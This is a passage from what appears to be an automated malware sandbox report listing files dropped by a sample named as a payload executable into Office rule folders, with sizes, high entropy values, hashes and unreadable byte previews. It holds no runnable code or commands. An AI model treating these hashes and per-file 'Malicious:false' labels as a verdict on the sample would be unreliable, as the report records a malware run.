                                                                                                                                                                      SHA-512:9127EAFC1B059989D18E76BAA7C435092F4973AD8E87981EFB0C2CA1FAAD73ADB832AA02D685B467CC17B000E6895EC6D5D71CEFD9A3AA971B738DB1BFED8F87
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.q.....q..@6.....R......3..*..yv!.d....Z_.....{..<.?.wzG.....&x..1..q.:.....sK.....1.@...J.H.V..Y.'........._.. .d.>...;.4...4...".x.c`..-^..F.lY..N.Bo.)..~Q.....B..h....'...T_.K..o..}c.7O...{/.8...q.9........R<....X;06.7.u.. ....'.j.P....q..>n....2.q.p.S.(a...-.f/.S.|!.#02.....v.k.T&..e.c[/w..b.}f..., #s...A..r.>YY......,O.P....C.J..z..5..#i.t.q..l<.t..h$At.cm...7....[.;.Y...-.....i.w......>Z..P.....nG6..Z..'..%......F...|@X.t.........8.<+.@N..N...0.B.H6MB}..$B....ux3..c$.C.:GW..p...!s.$...|...+...d.#..P..ap.......mp..^..g.f>... .B.!....%....x.X.v.A"..P.C..s...$(L....@.....s............."......i..w.u..6.%t......0.d.....W....{.(D.$...j.fb ..f^....+..C=..|......c.N.nJ.@!.....},.......~[\..y...>..y.......E.M....W..f.a..7...D[...)|#.gG.....Kv...``....~r..].!.Wh:.x......f."..g[...Y...@..dI>{i..l.4....&..).:...^.\e.:.^(?...RH.3~a>.vY.....I.m.o-|..o.@...Y.X.........i.0*.o...z.h.e.........2.Tz?d..,..6.s..3e.A\%.....ry]...2.hMA..........1x.G

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704001v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1753
                                                                                                                                                                      Entropy (8bit):7.88548596740804
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:DYFQE/u+HZj7yg61dvTL2eZ8p7WGB5U3oPD:Mm0j7yBd1kHAob
                                                                                                                                                                      MD5:3B138FEEFB00360AEFEB1954A95358E5
                                                                                                                                                                      SHA1:D4C0B549FC81D5E02BC7F23DB4A313AD0D0CED8A
                                                                                                                                                                      SHA-256:5B6B715F0BB94647C9F886F3609E1970B04A0A7C8F07BB2FF01C619BB9F0F5A2
                                                                                                                                                                      SHA-512:7F719393702A36EC8BC66357C095A3C389C7D1EF71C56EDB62CA1C03992901DB81A6036B445708295F856B77C5D6E64A4E9F875C2C4B1B2600DC5F8E40F50D74
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?....NL...nU.N..f...FMQ..Nt...q.._.7..'r.#=...$".dY.-...:._1".C a.~.F0.._...ur..U.m.}.PbG.k.$.E6...T.G.I..d.-~r.2".kA........(R.....3Z..`..i...&...)...O...n.F.Lq.....i...?...O........s.c1..o....7Cj.n..;....aa..3`0....U@.ZN.....:.......:........>.i..J....Q6...f...0.-k.....mk.J..^5......K..jdK.Lv........]&B[L.y.p..N....AOc...|. o.O..`S...z...z.b.U..wj/y....0.N.,.+..W".0....m._.,.....`....R..7.#....eT<..4.....U......Mm".Z{4.S.Te[..QQ$B7.2.SJ.+..2n.A...E'4K..|.[1.9.m.L..N.$kQz..%_....n....n....'DG.kKH..R.......i...@n.....[Pq.....}..:..R6..o#.0._....U..chg...Q....B.N...g..O"hX..C..Y...g.g.;...x..m..{.....:}....c.$.{".R..#.[gK6...lt.+^.4p..:X..S..S..xw.=.^.B~....h.......s-j...%;Y...q..hT....$....+&..S..P........[.i}....O..._v1V..'o&..... K....n..D4/..C4E.k.~e....".......|X.....tS.s9...x.zjQ...bZm.yo....p#......m{...I.\.D=.x..G.+F.A.N.~..l..<...9%.. .%.;iG.9.@..!~}5...O.m...P].y..V.{c.1...#(...C.Y.p..V.y......89.E>..r.f.> e.O.w

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704050v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1690
                                                                                                                                                                      Entropy (8bit):7.893640104723349
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:njX1QHSFy5cDrpOvvN9ffxrrtCjP+rTbTBU6rF73dWwxlzD:jeyqcHpOXbffRIyrTW6rFE4lf
                                                                                                                                                                      MD5:EF477CA81EC48C86F6EB35F3352E209A
                                                                                                                                                                      SHA1:D6D3881BCD7DDFBAE570E9217B196662912F1B2F
                                                                                                                                                                      SHA-256:E372B2197FF6394CAF89ABE06C5744115FBA8952686FF369BA0787E82322CF78
                                                                                                                                                                      SHA-512:2C07BFE402C1D5CC96720B4342B13148AB0F9D3787D2443AC2EDDC84C9FFC8CCE3721308B6DC538FBE5230D44AD1E19851097F7AF0ABC51629BADEE91F6CA248
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?...4...^..s..Lk-K.a.....M..m..=.-....D...Mu...t^...B.k.t........ |........DH....L...%c.D.<v..y)v..J..c.`....>....>....W.N.T........;........H..\.T...r5.."D+>..Rt..U.A.`.vg..\....(<....D...i.R7N.~'.R3G...3....o..0..x.4]..q.t..Z8x.4P.#...|...#aY....T.g*?_....9..7.%W......M.ac....;.2..~..Uo@...L..H6..(=.P.zS8x..L...n.k....4gd.$...X#.........K#E...C4.7.q91....S...p)<.U.%..1..'X...t.p......E{..K.S..r...].G-.)...c.}.U.u.Y.)Z..u..!.....%.rM._0=.....x..t0$..S.v.......Q=f.O".....%..p....e...b..q.s.-........Y.r.#...Wo.(...9r......W.......`l../..W ,%.R..zy.+..z......l..4./Q.D.2..y&o...W...USN.;..!...3AG...5...=T.u....&..UZ.5.....61......\w...H..@..9....'............^.........-e.$'.$!`.~P.DB.{..HC.g6.*..$.K.......6Hm.e.......(.7.Kq....rw.........#. ......U._.K.......Y.K5."..*V*iCo..._......b.FW...Ry.~U......<<H..w...V.A,.. ..8....AUC.c.jp.N....E..y.J.L.I!.....i.....C.s.^"Q-...A#.......y.......nKzY...... ....*G..PCb.z.1...&3uh...&>.j.....",.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704051v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1727
                                                                                                                                                                      Entropy (8bit):7.878083353399596
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:pDAUMnbP7i1q+dN26IWmPkSp9sKGAVwuD:BMbWpdjIWmVhL
                                                                                                                                                                      MD5:416449524CB35B7E96B7FBAA78CF4471
                                                                                                                                                                      SHA1:48B2E7A3277011824048E0185501D61F7EBCAF26
                                                                                                                                                                      SHA-256:A79A5A963785E9E43167FEFDFC3E773386AE9EBF4B1461E5616792BFA09FAD7C
                                                                                                                                                                      SHA-512:EA9BDE7055E4F731B6A824967510CA7D2899FC552A5EF71762B76FA98A5B751FB538FBDC97DD4037F8204346CF668DFCB7A3113FE088FCD60BF97DB72B446704
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.......D....v.E....Y.3...@.z.0K.p'....C<..%.4..U.!.P@ bZ...D".u.CU.r..(.$......"=sL...%.....+.G.NX...B......P...i5.KQi.w.0.......X]M!.V....).....z...7x.%.n.Q./....U.....[.~...H;...K.<../..p....c...........W\Du.8..~.{uN.n.....bp-.gqo.. .#..J8X.G....{d3O.i.J(cv..V...t.].... .;.>.(H[."w..i.b.o...{G.....~..g....#a..6..[.k.......D..Q..Y..M....b\.......\5.....".<.....(....1..n.m...w.R..X..........g..[..Pg..jO...3....XQ.P[.^'.{..O.>bB.....!......o.~h...R..}R.%..\..U..V...e.8Q:.T.s..y........DK.3.].HX......q+.kV......n>..|m...A.v..H...6!..:....c6....e..g....s0..'aO.d.NY..[W.Q%'!....#i|c....l.`.b.<.R..r....:.>....A..D8M!...A..&q.>}kb..w..+..>.}.C7.(...9...`v,>(:.....K..C...\.c...x-`*......s....st...4g`..0...<....6...0_......<.,q3.l.......5.ve...?.dbX.w.]..-..eyi..)b...s...i.l..%....3...;...........A..k(.7...N%#G....*.D...].....Am"..r&....{5.@o.l..zu.P~......E[..J.7.~...........ET._u*.6.LG.2.v.....R.d.3zw.!"l.]...#SQ...].A....<.u_.....y.2

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704100v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1696
                                                                                                                                                                      Entropy (8bit):7.888689655559145
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:KeUFrcePV1CBiyjvW89JTM5KTISmo+1hD:KeUFrdPQvW89aIT1f+J
                                                                                                                                                                      MD5:776F762B757D21B1E3FBDB16FE249F85
                                                                                                                                                                      SHA1:141E032029EEA5D2ED5ABDB7F1421E8B2B2AC6E2
                                                                                                                                                                      SHA-256:AD2C41253DD5B68F39D633AB34869F04A61F00B32E0E51055352649B19FD1E3D
                                                                                                                                                                      SHA-512:523B477EF4F4008CF7A8FE3101577C567DD318B598110EB4DD8BE0A897902D2913DB71BB6C0F0CB371EB968C9A49C4D301F103248A87B13340E9EC1AB09C8F7F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.s...V..>..Z.j.T..7s...ZE.F.1.6...j.a.*Y..\!..H..C...:~6....ZB..4..}.*#..6....o."..R.g.....Ue.....wwY......u......|....^..)...........:w...WO.5..-.X.Lg.b.=Pl%.V....Z.^;.L!....8.......W.}.....Ai.[..0.e........!..r.B.o.>....j...f..4..:....~8.z.C..../<.&..`^.....3.o.....jc.2e..v....8{...*.h....._....9..aE..f^.W.U..r...3..o.N!m.<~..VV...Q...jq......B.V.g.A.6.....K..X...l...!......$........1.&._.i.3......z..T...W...2WzW.0).0.m...H......o4.A..S..D....sbF.7.-.'..O......3...y...#9*. .w...W.?.{.{.J.........T.<&....2.N..e*.G..I._...Qym..d...Bj..q..E./....K.}.Z.L".$.Bp.`..2.i.....+].......Zs...!.H.k":QOG..uj5.P.>S....K.../].9K....e#..e.Dl.O..a...Z...|.m}...:...C..../...k....Z5.;..'.70...Mw...x.(...syOhu....T\.u..,.].Y.........K.ie.T..o...j..fW...d.Y.r.....).....Q..... 7.y.<F|.~..T.....wO.......f$.738{.cL.q|.....S..H.8.....AR.9.....Kp1..N;.k`.>o...l.b.+h3..T...Qfn!.?...w.!$......L.e.!....1..Cl..O...J@..>{Z..4.$...6F..T...F...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704101v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1733
                                                                                                                                                                      Entropy (8bit):7.873929575443401
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:OqfB/TzvYJueUqgKoY6egbHbvmqEpOJmPDowD:jB/vwJuqgF/VbvU
                                                                                                                                                                      MD5:475B4366FC50173B96E6780BD4E35DE2
                                                                                                                                                                      SHA1:63D55F0EDA5060876D821BA733117D90D1542DC9
                                                                                                                                                                      SHA-256:A24419F90C3B451D79AF6DD5C1794B6FCFD864EE7170DDF059E73678E31F3CD2
                                                                                                                                                                      SHA-512:0C4D99D9BD46B91A3C1E0579EB8C86B6E85345A53C28E69F75D263449FA9CA5E35BD2BAA5D1DCE6D88DDD8CB6FF36F3A1F869AE69D87ABD7C0B08A45C884C7B0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?.7Q..K....4.a{..wv. ......X.....;..I..J.......v...7i...........;..*...t.../...4) 5}......C......UZ2..-r.... .P.....H..[;....|...W..L.*.k....EI..2Z...5.p....1kz5._.$.]0mY9...=,...V.W.m....z...k.VZ.."i....v7..i;.e_a.Hl...}....e.z.....]L.G..........RI......O.R.l'..$.v..:6....=......H.W..Z..RH.D...sy.\. .;.!..aG.H........<kJ...........I.y...ES$'C....R..K..........I.|5..Q.c..s.kV7...6.f.....!3.....a.xC. tY;....-T.q...rf.V...G.kx....q..b@..\..{uT..5.~ .............N.p...K.s..1..d..'.(l^{X.G.D..R..6[.L......N.f.P.-..."....L....y.k.Z.,S`.*Iz.a.ca...!.Y..'m........l+...c-D.=.X.F..#.+......F1......H5..D..m........f.wv.v..n..{.J../.!TGod.G.P.Gs+......F..V.h....v.....<.Y......qvk.^.T...v.hW...V@B.}..4...Z:!6..S..*VET4.G....]..@1..<.#@.P...ZG...=...:.....k(.y.I...Q..'.....]...cQP...%:'N^C2-/..[..MZ..t..Ju.U.OM2z.|......R}..j0.........e6...5.$.4...).Q0.<2.r.}...Z.....\.v:....2.5....`..s.#t.......RG..0g.}...d.>..4....B....4.c-........O..V.._.oI.r.Q.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704150v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1696
                                                                                                                                                                      Entropy (8bit):7.889029112631568
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:67AkuS2ONOoPunRwGnqj0w1xELqxbzSKlqxTM5D:67Akup2xPunRwGnqj0qEubzuxTMx
                                                                                                                                                                      MD5:2D1CFC25348FD6AEE27045BB6ECB550C
                                                                                                                                                                      SHA1:0020EDDBD9A6072D1B5997D26DFD3961276AC94A
                                                                                                                                                                      SHA-256:AF4805A6F840799242A5165B9BE554C93CA229FA034711E506E9241B015290DC
                                                                                                                                                                      SHA-512:41DE415C8D759B14FAA01B1AECB3C609A9D4942D9AD22111E0ADBCB308AC7BCFB5F91016B8737BAEC60780802154FC84BCC6F64732430AD356E89BCCEF8CD1CE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?..{I.3.P.*..:4..C.. .(.U.........w`........+@*........s.M....2...k.\.....~.Il.M...._.......".Hi..F)..}!.L.z.N.6n]C..q.T..ZG..#......_.}..|..R|.$.`.p3..KX.....$...z.QqB.d3..<:O5.."..B7:&R@.+0...b..V....Z}tOV......2.B].......^..vWo.......D(.A...3,...$..R.6..wW..*.R\.%e...."..B2..M,.S...i.n..}...X.Y.m.T.ys..A..Q.v....y7..&.)..s..J....7t.5.P.[@S.R.....F.<..70.......?.fnCT....6..bp...K1.9..F..%B>uJ..X.....]:sk<...<.>..p.u...Tj'hw.r...9/...V.>[..A.{vzb!St...hY..0...Nu)"+..'Z..#....r...y.c.l..|..>.O..g.:&.9..=...gA.6....5Q7....fjX~.a`V....k..a$!.o.g@. .F.yC.@-.h..$/......./t.`0........{.....(..<...N...r..I ...h!.(.....N..K....h.F..$..i3....,.+.r...+....;c9.@j.".u.]....Y..o1X....:D.i.&3.&i....T.Q.....b.......O?%+.#..L.P..`b.wem4j.n...L..+_.?......;..&p..4.t@.BF.$.(.......<...%....\hpP$-.C9...{...fo;...;l/1&h.Q.|....s....n ..qJ...,.....|..d._.-f>..............*......V8..T3_..9(...od.D..q...c5..1.uYNk.WF.<.3.&.}..).s....y....7<..[j..D......n..J.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704151v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1733
                                                                                                                                                                      Entropy (8bit):7.875334761744911
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:7q8EvYtqaI31nMPm7BQGRU/QrX4GVBlZQ9oL0G+D:ueqxcm7BZwQflZQ9J/
                                                                                                                                                                      MD5:AEA9C6C796C01B8980BF53769FE9B877
                                                                                                                                                                      SHA1:93A5BCD7B9C922C30766EFEE61CFECADA13F8910
                                                                                                                                                                      SHA-256:C6106C3B1BCF1A33BAEC8A0864692C9AC648A40908E3E878EFF534D8EE7BA652
                                                                                                                                                                      SHA-512:ED1ABF10C50E5965022DAF40F06A5FD0C3D5DBD183E737FCAC9039AC61AAA4EC928EF19BDD789CAC5E186A89FB926CAB332B5D2BB71EE0D1057B8E9F6C395D6A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?...E[.+.R.:.Q...COn.&o..T...{5".o?/*.6^..<.....W.~.-O.......|<.....]...+o.w0..p...L.n.U...b</...Q..O......%V......B".CQ.i....O.....:.....C.w.".JM..m...) &o_.#..fP...s'..DC.=.....f%r......#p.::..0...lh]..w.Y...\R............s...9.`.$D.C@.h`0[...@._....a..;Yv6....3..'.R..C"..je.Q..N .....s.2....h....#...1p=.O@.5.U......\......k2..#o.B.3..$.....G.lC|....&..92...pt...WWc...b\i/.=..a...~..q.#.....l.W).\.....6.(}...g.....z..I.n.cB...?...`1..9..\...p.d..t..K...d..AA^..'?.L.........H......kxQ..,..[..F..$$...o...d.o.d.'......bK.J..\.. ...........5...H.<..D.xHc.'i..$...o...%CJ)K.......<.&.....b......Q.J.g.4I{.:.Q v...5.x...+..#..X.-.c.|..h....-....W....<..P...E.>1...=........3q.~cq3.......9w{....%J..J...z..G......Y.2..O..>./..y.p..k...8zi+....'...@.u...+.Q...NV&.@...n}.c~b......M...@$C.E....Q.M........3Ut...k.g.#.....=.../..b....?..[..&s.?.|.QDf.O&&...v.o.9^...I7$.b..x.3TO.K.?l...m.......+s.M.h.Vz...~L\.I..p\.....^.h.B......_4R.H..3

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704200v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1714
                                                                                                                                                                      Entropy (8bit):7.897998230757164
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:FUluvjSZcikRvgCS5UYef1+d8y+gimoj6yLXuD:FUArQcjvHMssKgiAyLXW
                                                                                                                                                                      MD5:6F247AD7FDAEB6BD0200A55A13E90D95
                                                                                                                                                                      SHA1:B6DC934A2E268484DB9DCD619188B719122F4A51
                                                                                                                                                                      SHA-256:B917AB4BFB6950E23B156A2894E31EE7A0DEF2E57661E715586201277A0D55A6
                                                                                                                                                                      SHA-512:7D0023FE2F161671D74CC35F56A5400144E164DAF0EF093E028242FA54F796B77B7A1317F0B65A1723CBD52ADF2AB9C2C65940B92BB229DD3EBEE55EE1753F45
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?R<\.l^..L'FdgQ.......b...... `...R{..wd.v.....J......U.l.....c...Y..../[..|..8.$1...t....?...tOH;..O..E.W..^.K......O......?.ho.c....Q...6_.....%....[C.F....t..v ..[/.6.G......|,dZ.Y......E...M...5....f...E... ~fS.-N/7.E0....m..."!...I..m.'j..K%..t......Y.k4H.W...w.&..?A.|5.!2....3Xu.........{l..6`[#.,....6..b".....9.p..l..)..5..wZ.T{......+ ..(o....V..W(#Ut..H.P...w..._l..RJ.h..w.F.&...&-...Oh.......U.....b.D........w..#.c..|j.cf.....q..........zb>.b~......_.=.*........j..r....1T5.X5.U.....+X..W.>.n..M)......jg.)..fi...j.Eq./.L(.Rjp...$.Gd.e....?..vz./EUW...e?.l...........<I.....^......ei.Oq|..!...L...~.k...D.Cf{X.gN....!.B....m>..i.nSy..F..A.d.v..A/.>....n.<.*.........O..........6X.Ng.5.o..z...c..].....lz=fQy...a..e..N.xb.NXV2T.0.Q.t...1....F;..G..)2..~b}..4?f...tlS LQ.0Oia2....C...K.......;>.Y.^B|.{q0..."*.O./.]..[}......b6.....@.J.A../.V.|.3.$.16....o....}#.es........z%1S.i..M.^w.V.l. ...*"..q..d.=;nI.*5.tI...1.*.k....Y.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule704201v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1751
                                                                                                                                                                      Entropy (8bit):7.898915432689234
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:tA8VS8flrxhF7kNbVTgNQvx4YWUJZnsbxO36JD:JVl5ah4YWWZuxv
                                                                                                                                                                      MD5:4BEB04BBDE8536E7F37F5998B287D67E
                                                                                                                                                                      SHA1:1ED3B31336921D956C99E2D19A44D0159DA460DD
                                                                                                                                                                      SHA-256:D955BB077D3ADF53F7FCF10C0ED8EA46761794E4AF2EDFEC05DBDD6E018F97FF
                                                                                                                                                                      SHA-512:4AE3391DF0F67F55C166012CA98985ED9EF9B784D8A988698CE6BE00A911765A52A2BF567CD91146AA2A5E288FA2772371BC081F9CDFCAEB7B2CAD08C0348B2C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.<?P......1...A[...=.t-..xp....z7.<]o.n...4...F7.*=....| T........MRyH7A.....n...U...D..4.:....{=Ri.=.J.....\.&....C.u.L..<...I0J.....6Tt$h!33..=QO,......v...u.D..gze,..E)..n.!z.0...q.6.T^.<x....X}.........}E..\.<...]..}]]5...~..I.A-u..-.b..7..C....}.e..dz.t.T..@...F].9.Wq.^.K....|.S...m.LWnB>.W.M...b~Ka..q.h...s x...)..&.&DZ.2E..8..z.S.t..ho .1&.g...).]..W.|1.....#+(ts.6..V.................7..v\....xn...lE.$...?.0s..s..|.#A.>1..K.2..L.H/.....k.'..W......S..,;+.b.Fz.0.r.........%....%Y.......-.G..E'7....N...`....?E.N;.b......|...?m.>..,..\..%...;..do.[..l.P ........~..-4h8...i..........g._.......sW....z..C.Y$....... ..hZ..`...+.m-d.."..8.9.6......~R....Ff.N..l.M..R.^..(h.S".Q1.(....c..;.4..-..h.>......I..t.....o6<.|.S...lv+.m#.+c...T$.0U...(.5.I...mpomd...!.o.|.YL.......3.o....:PBGq..z...<.]....eQ$y.^.zq.tzF....;Q.k...F?.b........B.%<....R| u.kv. .!.g.9.85i...r.:c..ub.....[b].3^.}...m.......w.....4~.G.7.:....X.N..GIdUs......G.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule90401v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1583
                                                                                                                                                                      Entropy (8bit):7.880279863298789
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:wsMRv/3lH7NIocVTbkn//38sEstfHf0rHPrToiW0rkr323THSCff2rz21nKjxV2X:wnFH7mocV3a/vGsXmPrToe7HGn2RKgD
                                                                                                                                                                      MD5:EB96FB32C0D4023B5720E8BDDE742DBE
                                                                                                                                                                      SHA1:E49ED3C2F61FE027DB321ADA20207A6837AEEBA6
                                                                                                                                                                      SHA-256:DD9C9BFC37B5C78D3AD3D631E340F3D44CEA2053705E41200545179B30DCF909
                                                                                                                                                                      SHA-512:097B63747A79F5326336A401E8EB39DBB7897AE6BB7FB2009BBD36EEE9CA7D98B8386F56B11A3B3F981E7086833501FED679F354223CD46935897F4E9C24CF0A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..U..b.chjn...#...E.-6.j..sJ.T.. U...y=.k~..3jy/..(a..u_Y..D../.|e|....jY..'.....$....\.l.0..z..........>.I.'....4.;.3?..l..r.v.x.W..M....%.>.2....Lih..k.g.2...'.<E.b..99..A0.".....l...?...........'4..t...m(.*I..<+.....<..o........7h..N....<)...p~......'&G.t=.!,.n.d.x+.Y......QGGk.. .."bX......Ko\@....|..~..a......V9..D.}....~..b=.!..?...'..xCm0......<.. .Y#..C....#.a....HYU.i........E.._.$....)0.....>.U..*.V~.{.<.9....Q.pr.-w7.]Q]|..t.a.'..........?QR.-..PI+.!...J&1.%...9...\B..]...9W..!B...B.+....Y54O.`1mai.b.....MQ...._..R..LY..a.i.%.FT6b....K....\..|........$...n.T..".[..<.`L6./.@.ib.|M.y.)..,....:..H....P..B.....b.N..b.....W._....,........E.?..u4.h..r.e.......P...E.9...(.....e......o.jR.....=.D.y......o.K..|..&.1......+..t.....@j...@.5...........(!..=._.>.;.3...q.Y..<..R..Vp.'...U....W...:..FKe ..r......>.Ff....{5...m>>.P...u3z(~.....Nu;.v>...A.6....FH..Q3)...(..B...=..f!.E..D.......+......M.....E.|..`.H..<l.o..Dc[..1.X8.......

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule1000v5.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1928
                                                                                                                                                                      Entropy (8bit):7.881888469416626
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:l3apdv1hYS3RacZs+v3qEYd/gQ+Momi2QHY4PE/9tXD:1Qig1s6vYdUqpQHY2WPT
                                                                                                                                                                      MD5:C8630A67C43A87FC349E3F8E91204085
                                                                                                                                                                      SHA1:F4A5870B202568CDA603EFD12125024B713E52A6
                                                                                                                                                                      SHA-256:1AEC754F665F8A2106E454A2777CC858E813C15534B7AF6F1CC0A1D84E500AA5
                                                                                                                                                                      SHA-512:7821FA7982C973BFCC9D6CD96E72E754F3FECD72BDEC4727D5779AC6EB7B98EE31890F21893DFD8793EBB17B86E5A41E39A3A29D2A13EAF8E30292F6BD6FA0C9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml*.K........T3.._......^...l#......W..{1-.4 .T...n./.-.<.....O..'%.j.....R...Z.....c{)j.S.A.....].Pj........F.S$."...j.Z.q.....1T.l.sjB%9|7...D{.9..."..).ib.......w.$.8;=&......'..L..k./.k.......^7aR......f.q..c...._....-..p..F....W4.8BDhIFp0...2.*.Rrk.x....G..p[...\.f.F%.K.f..`~..y......Jm`.B.<.....{>...9..J,l...NY ~....{..G..Z.25U...$..F.bw5n...^!.`..'j8.K...b;..;.s>..S..g.8.w.+u-..(h........B..ck.........oIOQ..C#...<f4p.b}07.[A.{.....}......uZB.T..p.lB.JE..`2....).N*r..q.0..}e.s..A$....0.h.0.x..w.e.P..EbY.z.x.S............C....b4.1............)2Du:.....7.~.H\^....8...G.H....z....R.-G...F;....b6...?..h.\.^.r.6y..^Wh........,....x....S....L#.JD.i.WDy\.t......Vy...5.0&.U.`..\4.p....Hs.R....V7op<.......X...../.&..G4._.MV!1(...;....l.!..Ut.zH@...).Z{f4...E..............u6 .f.r.u:u...a.5.[..C..>..9....q.r..... ;>.g...1........W,...v.._.g.MY.}R...fX..Jrl..f..z....un..r....{1"p*.?T.......9...........p22......0."..KT.....#.3.../.Q....2g.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10450v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1387
                                                                                                                                                                      Entropy (8bit):7.873141319894317
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YepJq+R3IGspZpnUEZfkx/fsr4KrVhbSKAWvLrt36wjWD+SFmV2bD:YezRIGy3UEZuMrzVRSSjrtq8IXD
                                                                                                                                                                      MD5:6F0284BCDB93A854A31490AE1D16916C
                                                                                                                                                                      SHA1:CE98E9FCC31B392663F2185A926DA36AF9C72585
                                                                                                                                                                      SHA-256:E9C6AD0896EA5E189C220B69CE58CA7A3F89B5872A4C3E1B7C4663A1C5671807
                                                                                                                                                                      SHA-512:40C838F904E8F66D477F4D1FF6E52B389C948FAC3E4A2E8A56DE39B12DF8DDE1EAEE8E5EF68CB4A6F4014555B2563B87E87AB8046EF3D3B5A77AB2DDFCB43566
